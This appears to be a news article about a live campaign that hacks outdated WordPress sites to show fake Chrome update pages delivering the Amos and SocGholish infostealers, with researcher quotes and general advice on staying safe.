Understanding the Ongoing Cyber Threat: Hackers Targeting Outdated WordPress Sites

In a concerning revelation, cybersecurity researchers have uncovered a widespread hacking campaign that exploits outdated versions of WordPress and its plugins. This nefarious operation aims to alter thousands of websites, tricking unsuspecting visitors into downloading and installing harmful malware. Simon Wijckmans, CEO of the cybersecurity firm c/side, disclosed the details of this ongoing threat to TechCrunch, emphasizing that the campaign is still “very much live.”

The Scope of the Attack

The primary objective of these hackers is to disseminate malware that steals sensitive information, such as passwords and personal data, from users on both Windows and Mac operating systems. Alarmingly, some of the compromised websites are among the most visited on the internet. As Himanshu Anand, an analyst at c/side, explained, this is a “widespread and very commercialized attack.” Unlike targeted campaigns that focus on specific individuals or organizations, this hacking scheme operates as a “spray and pray” approach, aiming to ensnare any user who visits the affected sites.

How the Attack Works

When a user visits a hacked WordPress site, the content is swiftly altered to display a fake Chrome browser update page. This deceptive page urges users to download and install a supposed update to continue viewing the website. If a user falls for this ruse and accepts the update, they are then prompted to download a malicious file disguised as the update, which varies depending on whether the user is on a Windows PC or a Mac. This method capitalizes on the trust users place in their browsers and the urgency created by the fake update notification.

Alerting the Authorities

Following the discovery of this malicious activity, c/side informed Automattic, the company behind WordPress.com, about the hacking campaign and provided them with a list of identified malicious domains. While Automattic acknowledged receiving the report, they did not provide a comment prior to publication. Afterward, a spokesperson stated that the security of third-party plugins ultimately rests with the developers of those plugins. The spokesperson emphasized the importance of adhering to specific guidelines set forth in the Plugin Handbook, which addresses various security topics and best practices for maintaining user safety.

The Scale of the Compromise

C/side has reported identifying over 10,000 websites that appear to have been compromised as part of this hacking campaign. By crawling the internet and conducting reverse DNS lookups, the researchers were able to uncover additional domains hosting the malicious scripts. While TechCrunch could not verify the exact figures presented by c/side, one hacked WordPress site was confirmed to still be displaying malicious content as of Tuesday, illustrating the urgency of addressing this issue.

The Malware in Action

The two primary types of malware being propagated through these compromised websites are known as Amos (or Amos Atomic Stealer) for macOS users, and SocGholish for Windows users. According to a report released by cybersecurity firm SentinelOne in May 2023, Amos is categorized as an infostealer, designed to infiltrate computers and extract sensitive data, including usernames, passwords, session cookies, and crypto wallets. This data allows hackers to further infiltrate victims’ accounts and unlawfully access their digital assets.

Insights from Cybersecurity Experts

Patrick Wardle, a macOS security expert and co-founder of DoubleYou, an Apple-focused cybersecurity startup, characterized Amos as “definitively the most prolific stealer on macOS.” He explained that it operates under the malware-as-a-service model, where developers sell the malware to hackers who then deploy it. Wardle also highlighted that, for the malicious file identified by c/side to install successfully on a macOS device, the user must manually run it and navigate several security hurdles set by Apple, which provides a layer of defense against such attacks.

The Importance of Vigilance

While the tactics employed in this hacking campaign may not be the most sophisticated, they serve as a stark reminder for users to exercise caution. The reliance on social engineering—tricking users into believing they need to update their software—demonstrates the need for vigilance when handling software updates. It is advisable to use built-in software update features in browsers and to download applications only from trusted sources.

The Broader Implications of Password-theft

Password-stealing malware has been implicated in some of the largest data breaches in history. For instance, in 2024, hackers launched a mass raid on the accounts of major corporations using passwords stolen from employees of clients of the cloud computing giant Snowflake. This highlights the critical importance of maintaining strong cybersecurity practices to safeguard sensitive data and prevent unauthorized access to systems.

Conclusion

The ongoing hacking campaign targeting outdated WordPress sites underscores the critical need for website owners to keep their systems updated and secure. As cyber threats continue to evolve, users must remain vigilant and proactive in protecting their personal information. Regularly updating software, utilizing strong passwords, and being cautious of unsolicited prompts to download updates are essential practices in mitigating the risk of falling victim to such attacks. By staying informed and taking necessary precautions, individuals and organizations can better shield themselves against the ever-present threat of cybercrime.